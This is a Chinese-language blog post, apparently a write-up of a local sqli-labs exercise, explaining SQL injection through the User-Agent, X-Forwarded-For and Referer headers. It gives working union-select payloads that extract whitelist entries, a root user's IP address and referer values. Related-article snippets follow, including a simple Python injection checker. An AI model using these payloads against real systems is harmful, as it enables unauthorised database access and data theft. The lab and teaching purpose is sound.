SQL注入漏洞-Headers注入

最新推荐文章于 2023-06-07 17:15:00 发布
最新推荐文章于 2023-06-07 17:15:00 发布
阅读量2.2k 收藏
点赞数 1
分类专栏: SQL注入 文章标签: sql web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43844217/article/details/123311110
版权

http header信息头是HTTP协议的重要组成部分,包含了一数据段来于服务器进行通信。我们这里主要是利用三个:UA、X-Forwarded-For和Referer。UA是包含了操作系统版本,浏览器版本信息的一组字符串,很多网站用他来判断操作系统和浏览器类型,来展示对应的页面。也有很多通过UA来判断访问是否合法,是用户访问还是程序访问等。X-Forwarded-For被认为是客户端通过HTTP代理或者负载均衡器连接到web服务端获取源ip地址的一个标准。部分网站通过它来辨别访问者的IP信息。Referer是来源信息,在防盗链中使用广泛。

关键代码为:

这个系统采用白名单机制来判断UA是否符合标准,其他UA一律视为爬虫会被ban掉。那么我们通过注入猜解一下白名单那中的UA是中,是否有windows操作系统。

用火狐浏览器中的相关扩展插件(Modify Headers),将UA改为:' union SELECT 1,2,3,uagent FROM uagents WHERE uagent like '%windows%

 关键代码为:

 构造语句得到root用户在数据库中的IP地址,沒有修改的如下圖所示:

用火狐浏览器中的相关扩展插件,将X-Forwarded-For改为:’union select 1,2,3,ip_address from uagents where username='root'#

 得到10.10.10.10

关键代码为:

请构造语句来猜出10.10.10.10的referer,沒有修改如下圖所示:

用火狐浏览器中的相关扩展插件(Modify Headers),将Referer改为:

 ' union SELECT 1,2,referer from referers where ip_address='10.10.10.10'#

 得到http://127.0.0.1/sqli-labs-master/

HacHunter
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL基于HTTP Header注入 ctf从入门到放弃l190513学习笔记
爱党人士
05-14 466
队长不给活路,不写笔记不给睡觉。 什么是http header注入 ?? 有些时候,后台开发人员为了验证客户端头信息(比如常用的cookie验证) 或者通过http header头信息获取客户端的一些信息,比如useragent、accept字段等等。 会对客户端的http header信息进行获取并使用SQL进行处理,如果此时没有足够的安全考虑 则可能会导致基于http header的SQL I...
Header:请求头参数详解
panying1的博客
12-08 2653
Header 解释 示例 Accept 指定客户端能够接收的内容类型 Accept: text/plain, text/html,application/json Accept-Charset 浏览器可以接受的字符编码集。 Accept-Charset: iso-8859-5 Accept-Encoding 指定浏览器可以支持的web服务器返回内
SQL注入漏洞测试(HTTP头注入)
weixin_47493074的博客
09-29 1102
SQL注入漏洞测试(HTTP头注入)
SQL注入之Header注入
秋水的博客
09-01 3929
Header简介 什么是Header头? 通常HTTP消息包括客户机向服务器的请求消息和服务器向客户机的响应消息。这两种类型的消息由一个起始行,一个或者多个头域,一个只是头域结束的空行和可选的消息体组成。HTTP的头域包括通用头,请求头,响应头和实体头四个部分。每个头域由一个域名,冒号(:)和域值三部分组成。域名是大小写无关的,域值前可以添加任何数量的空格符,头域可以被扩展为多行,在每行开始...
SQL注入漏洞测试(HTTP头注入)——操作记录
chick11的博客
07-16 160
burp抓包判断注入位置,回显正常 有报错,存在注入点 确认列数 确认返回位置 查询当前数据库以及数据库版本 返回库名:pentesterlab union select 1,2,3,(select group_concat(table_name) from information_schema.tables where table_schema=database()) 表名:comment,flag,go
WEB项目HTTP HEADER常见的安全漏洞
m0_37049740的博客
03-12 2650
WEB项目中有些常见的漏洞,是大家都没注意到或者不了解的。这当中涉及了前后端程序设计的安全问题,也有HTTP 报文头的常见漏洞,如XSS等。这里梳理一些常见的漏洞,给大家做说明与提供一套解决方案。
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
* SQL盲注:是一种类型的SQL注入攻击,攻击者可以通过猜测数据库名和其他敏感信息来获取访问权限。 * 手工注入:是一种类型的SQL注入攻击,攻击者可以通过手动输入恶意数据来获取访问权限。 * BurpSuite:是一个Web...
sqlmap注入说明
03-08
SQLMap是一款强大的开源渗透测试工具,用于自动化检测和利用SQL注入漏洞。它能够通过网络与目标数据库交互,发现并利用数据库管理系统的安全漏洞,从而获取敏感数据或控制受影响的数据库服务器。 #### 基础概念 在...
sqlmap注入详解文档
最新发布
06-30
- **定义与功能**:SQLMap是一款免费且开源的渗透测试工具,专为自动化检测和利用SQL注入漏洞而设计,并进一步接管数据库服务器。该工具拥有强大的检测引擎以及一系列用于渗透测试的特性。 - **官方网站**:...
sqlmap语句.doc
04-29
`sqlmap`是一款强大的自动化SQL注入工具,用于检测和利用SQL注入漏洞。以下是对`sqlmap`中各个关键选项和功能的详细解释: 1. **Options(选项)**: - `-version`: 显示sqlmap的版本信息。 - `-h`, `-help`: ...
第三节 Sqli-lab环境搭建-01
09-15
这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是一个PHP调试环境的程序集成包,集成了最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,可以一次性安装,无须配置即可使用。这使得...
SQL注入漏洞-06】HTTP头部注入靶场实战
cc
02-05 6309
常见的sql注入一般是通过请求参数或者表单进行注入,HTTP头部注入是通过HTTP协议头部字段值进行注入。updatexml()函数回显字符长度有限,先获取用户数量,再逐一获取用户名和密码需要找到注入点 才能够闭合引号的注入参数。
sqli-labs学习笔记(七)less 18-22 header注入
闵行小鱼塘
09-12 392
继续学习sqli-labs,本篇是less18-22
Day3 SQL注入之报错注入(Header注入
Luminous_song的博客
09-05 356
目录报错注入基本SQL语句Updatexml注入步骤具体代码 报错注入 当场景中仅仅将sql语句带入查询返回页面正确,没有返回点的时候, 需要报错注入,用报错的回显把我们想要看到的东西,以一个报出错误的形式展现出来 基本SQL语句 插入数据 insert into <table_name>(columns1,columns2,...) value ('value1','value2',...) 更新xml文档,中间参数为路径 select uodatexml(1,'~',1) 语法
5-9http header注入讲解和案例演示
山兔的博客
05-11 634
基于HTTP Header注入  什么是http header注入  基于http header(cookie)注入的测试  基于http header(其他字段)注入的测试 什么Http Header注入 http header不是一个漏洞,是一个出现sql注入漏洞的场景,有些时候,后台开发人员为了验证客户端头信息(比如常用的cookie验证),它会把客户端的cookie获取到之后,去到后端进行相关的操作 或者通过http header头信息获取客户端的一些信息,比如useragent、accept
SQL注入——HTTP头部注入
qq_52072846的博客
02-18 2895
实验目的 理解HTTP头部字段User-Agent、Referer、Cookie、X-Forwarded-For等的含义 和作用,掌握HTTP头部注入的原理、方法及基本流程。 实验原理 有时候,后台开发人员为了验证客户端HTTP Header(比如常用的Cookie验证 等)或者通过HTTP Header头信息获取客户端的一些信息(比如 User-Agent. Accept字段等),会对客户端HTTP Header进行获取并使用SQL语句进行处理,如果此时没有足够的安全考虑,就可能导致基于HTTP Hea
渗透测试基础-Head注入
学习、分享、交流
05-16 858
前提:目标网址会记录你的一些head信息,放进数据库,那么只要放进数据库,就说明与数据库产生了交互。 --> 可能就存在数据库注入漏洞
(手工)【sqli-labs18-19】Header注入:原理、利用过程
07-10 542
SQL-Header注入
【JDBC:连接MySQL数据库】出现SQL注入的解决办法、什么时候需要使用SQL注入、事务的使用、悲观锁乐观锁
博客
06-07 825
以上的配置是针对文本编辑器的方式开发,使用IDEA工具的时候,不需要配置以上的环境变量。Oracle数据库有自己的原理、MySQL数据库也有自己的原理、MS SqlServer数据库也有自己的原理。JDBC开发前的准备工作,先从官网下载对应的驱动jar包,然后将其配置到环境变量classpass中。Statement的SQL注入在业务需要的时候需要进行sql语句的拼接。JDBC的本质是SUN公司制定的一套接口(interface)因为每一个数据库的底层实现原理都不一样。每一个数据库都有自己的实现原理。
python实现sql注入检测插件实例代码
05-13
Python是一种功能强大、易于学习的编程语言,可以轻松实现SQL注入检测插件。下面是一个简单的示例代码: ``` import re import requests def sql_test(url): payload = "'" headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'} r = requests.get(url + payload, headers=headers) regex = re.compile(r"You have an error in your SQL syntax") result = regex.search(r.text) if result: print(url + " is vulnerable to SQL Injection!") else: print(url + " is not vulnerable to SQL Injection!") if __name__ == '__main__': sql_test('https://example.com/page.php?id=1') ``` 这个函数首先构造了一个SQL注入payload,然后发送带有payload的GET请求。接着,函数使用正则表达式来查找是否存在SQL注入错误。如果找到了该错误,则认为该URL存在SQL注入漏洞;否则,认为该URL不存在SQL注入漏洞。 需要注意的是,该代码只是一个示例,实际使用中无法检测所有类型的SQL注入攻击。因此,开发人员需要仔细评估和测试插件的可靠性和准确性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值